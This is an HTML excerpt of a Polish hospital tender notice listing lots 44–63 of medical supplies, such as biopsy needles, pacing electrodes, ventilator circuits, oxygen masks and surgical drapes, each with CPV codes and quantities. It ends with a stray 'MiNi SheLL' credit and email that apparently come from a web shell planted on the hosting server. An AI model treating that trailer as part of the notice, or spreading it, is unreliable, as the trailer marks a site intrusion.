<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE  NR  2 Igły z mandrynem  do punkcji torbieli nerki  
Igła    20 G   dł.  20 cm	szt.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 45 <b>NAZWA:</b> Pakiet IX.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 3 Igła do biopsji cienkoigłowej Chiba - jednorazowa, uniwersalna, do aspiracji cytologicznej, miejscowego znieczulenia, nakłuć diagnostycznych; wyjmowany mandryn dopasowany do igły. Ruchoma blokada oraz skalowana umożliwiająca bezpieczny kontakt głębokości wkłucia. Rozm.: 20G x 120mm, 
20G x 150 mm szt.	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 46 <b>NAZWA:</b> Pakiet IX.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 4 Igła do biopsji tkanek miękkich do pistoletu Magnum Bard. Igła typu  tru - cut z uchwytem ułatwiającym zamocowanie w pistolecie; wewnętrzny endogeniczny marker; barwne oznaczeni średnicy igieł; długość pobieranego wycinka - 2 cm	szt.	70.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.23-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 47 <b>NAZWA:</b> Pakiet IX.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 5 Połautomatyczna igła typu tru - cut do pobierania wycinków histologicznychh z gruczołu krokowego ; możliwość doboru głębokości wkłucia po wystrzale;   jednokrotne naciągniecie igły  - 1 cm, dwukrotne naciągniecie igły - 2 cm ; zdejmowana kaniula zewnętrzna umożliwiająca wielokrotne przeprowadzenie zabiegu, posiadająca element zabezpiecz jacy przed przypadkowym przesunięciem się igły, posiadająca oznaczenie echogeniczne, oraz oznaczenie na igle pozwalające na kontrolę głębokości wkłucia igły; wygodny uchwyt	szt.	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 48 <b>NAZWA:</b> Pakiet IX.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 6 Igła do punkcji mostka jenarazowego użytku. Zakres regulacji pierwszego stopnia 10 - 30 mm, długość igły po wyjęciu regulatora ok. 50 mm, 15G x 30, ostra, uchwyt - rękojeść ułatwiająca manewrowanie	szt.	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 49 <b>NAZWA:</b> Pakiet X.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 1 Śródoperacyjny system do odsysania ran	
1. wkład workowy do ssaka o poj. 3000 ml, kompatybilny z posiadanymi w szpitalu pojemnikami	szt.	1 120
2. wkład workowy do ssaka o poj. 2000 ml, kompatybilny z posiadanymi w szpitalu pojemnikami	szt.	450
3. proszek żelujący (opak. 20 - 25g)	szt.	1 600
4. pojemnik plastykowy na wkład workowy o poj. 2000ml	szt.	5
5. pojemnik plastykowy na wkład workowy o poj. 3000ml	szt.	5
6. wspornik (uchwyt) umożliwiajacy zawieszenie pojemnika na szynie szt.	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 50 <b>NAZWA:</b> Pakiet XI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 1 Elektrody do stymulacji serca	
1. Zestaw do zakładania elektrod stymulacyjnych przez żyłę podobojczykową, kompatybilnych z rozmairem elektrod F6. Zestaw ułatwia założenie elektrody. Zawiera: indroduktor (typu peel away) do zakładania elektrod przez żyłę podobojczykową zblokadą składający się z koszulki rozrywalnej i rozszerzacza; prowadnik; igła 18G; strzykawka 	szt.	30
2. elektrody do stymulacji serca - długości 125 cm sterylne FG - CH 6F /Endokawitarne, zagięte/	szt.	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.22.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 51 <b>NAZWA:</b> Pakiet XII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 1 Obwody oddechowe do respiratorów: materiał PCV (polichlorek winylu); 2 rury gładkie wewnętrznie, ograniczający zaleganie bakterii o dł. 180cm; kolano z portem luer - lock; trójnik Y z dwoma portami pomiarowymi zbezpieczonych korezckami przytwierdzonymi na stałe do obwodu; średnica rur 22mm; złącza elastyczne 22mmF; sterylny, pakowany folia-papier; czas stosowania 7dni; przydatność do uzycia min. 5 lat od daty produkcji.  szt.	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 52 <b>NAZWA:</b> Pakiet XIII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 1 
1. Sonda gastrostomijna jednorazowego użytku wykonana z silikonu, przeznaczona do długotrwałego żywienia. Posiada oznakowanie głębokości ze skalą w cm, posiada balon, centralnie położony otwór końcówki dalszej oraz otwory boczne minimalizujące zatkanie sondy. Ruchomy krążek do umocowania sondy. Część dalsza sondy posiada trzy wejścia, dwa z nich zamykane korkiem. Centralne wejście służy do podawania pokarmu, boczne do płukania sondy i podawania leków, a trzecie wejście z samouszczelniającym zaworem wypełnianiu balonu
długość 17 cm, balon 30 ml           CH 22 szt.	5
2. J. w. długość 17 cm, balon 30 ml    CH24	szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.41-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 53 <b>NAZWA:</b> Pakiet XIV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 1 
1. Zestaw do tamowania krwawienia z jamy nosowo - gardłowej typ I C (80mm) lewykpl.	15
2. j.w. typ I C (80mm) prawy	kpl.	20
3. j.w. typ I A (90mm) lewy	kpl.	15
4. j.w. typ I A (90mm) prawy	kpl.	25
5. Przyrząd do drenażu jamy bębenkowej ucha środkowego typ I średnica 0,9 mm kpl.	100
6. j.w. typ I śrdenica 1,15mm	kpl.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 54 <b>NAZWA:</b> Pakiet XV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE Nr 1 Maski tlenowe	
1. maska tlenowa z drenem ok.. 2 m o średniej koncentracji tlenu  	szt.	100
2. maska tlenowa z drenem ok.. 2 m o wysokiej koncentracji tlenu, z workiem szt. 400
3. przewód tlenowy do maski , długość ok. 2 m	szt.	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.71.10-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 55 <b>NAZWA:</b> Pakiet XV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 2 wielorazowa prowadnica do trudnych intubacji, elastyczna, z wygiętym końcem	szt. 	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 56 <b>NAZWA:</b> Pakiet XV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 3 - rurka ustno - gardłowa Guedel jendorazowa; sterylna; rozmiar kodowany kolorami; pojedyńczo pakowana w rozm.:	
1. rozmiar 000 długość 3,5cm	
2. rozmiar 00 długość 5 cm		
3. rozmiar 0 długość 6 cm		
4. rozmiar 1 długość 7 cm		
5. rozmiar 2 długość 9 cm		
6. rozmiar 3 długość 10 cm		
7. rozmiar 4 długość 11 cm		
szt.	720.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 57 <b>NAZWA:</b> Pakiet XV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 4 - ustnik do spirometru - złącze standardowe 22F	szt.	1 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 58 <b>NAZWA:</b> Pakiet XVI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 1 
1. strzygarka chirurgiczna z ruchomą głowicą do usuwania owłosienia w polu operacyjnym	szt.	1
2. ładowarka do strzygarki chirurgicznej z ruchoma głowicą	szt.	1
3. ostrza do strzygarki z ruchomą głowicą opak.= 50szt.	op.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.72.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 59 <b>NAZWA:</b> Pakiet XVII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 1 Sterylna osłona na przewód kamery o wymiarach 240/250 cm x 16/18 cm, pakowana indywidualnie 	szt.	1 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 60 <b>NAZWA:</b> Pakiet XVII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 2 Obłożenie do artroskopii, sterylne o wymiarach 230 cm x 320 cm ze zbiornikiem na płyny, podłączeniem ssaka, organizatorem przewodów, wykonane z materiału wodoszczelnego 	szt.	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 61 <b>NAZWA:</b> Pakiet XVII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 3 Uchwyt na przewody, samoprzylepny, jałowy, szerokość paska 2,5 - 4 cm, długość do 30 cm. 	szt.	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 62 <b>NAZWA:</b> Pakiet XVII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 4 Folia sterylna - do mikroskopu operacyjnego Moller - Uniwersa 300 szt.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 63 <b>NAZWA:</b> Pakiet XVII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 5 Pojemniki na zużyty sprzęt medyczny typu igły, kaniule, igły punkcyjne   -   wykonany z twardego PCV; zapobiegającego ewentualnym przebiciom. Pojemnik powinien posiadać odpowiedni otwór z ząbkami do zdejmowania igieł; pokrywa z zamknięciem uniemożliwiającym ponowne otwarcie, celem przesypywania zużytego sprzętu. Wielkość zgodnie z rozmiarami podanymi w opisie	
Pojemnik do zużytych kaniul długich            1 ,0 - 2,0 l	szt.	550.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com